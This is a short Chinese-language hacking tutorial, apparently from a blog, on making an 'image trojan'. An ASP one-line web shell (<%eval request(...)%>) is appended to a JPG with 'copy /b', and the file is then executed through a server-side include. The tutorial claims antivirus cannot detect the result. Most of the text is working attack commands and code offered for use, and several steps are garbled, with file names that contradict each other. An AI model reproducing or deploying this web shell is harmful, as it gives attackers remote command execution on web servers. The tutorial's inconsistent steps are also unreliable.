主要亮点:图片木马(可以正常打开显示的木马)
先看代码:
仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。
0dayhack、找一张图片,名字改成0dayhack.jpg
2、
<%eval request(“www.0dayhack.com”)%>
存为0dayhack.asp(就是一句话木马)
3、copy 0dayhack.jpg /b + 0dayhack.asp /a asp.jpg 存为0dayhack.bat文件
注:以上三个文件放在同一目录里面
复制当前目录下的0dayhack.jpg图片和当前目录下的0dayhack.asp文件并以ASCII代码的方式合并为 asp.jpg图片,运行0dayhack.bat,就会出现一个图片0dayhack.jpg,现在这个0dayhack.jpg就是已经做好的木马了。
这个图片外表很正常,用缩略图也看不出任何破绽,但是却非常的危险,让人防不胜防。
利用方法:新建一个asp.asp 内容为:
<!–#include file=”asp.jpg”–>
把0dayhack.jpg 和 0dayhack.asp 放在同一目录,然后访问: 0dayhack.asp 用这种方法,任何杀毒是搜不到的
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论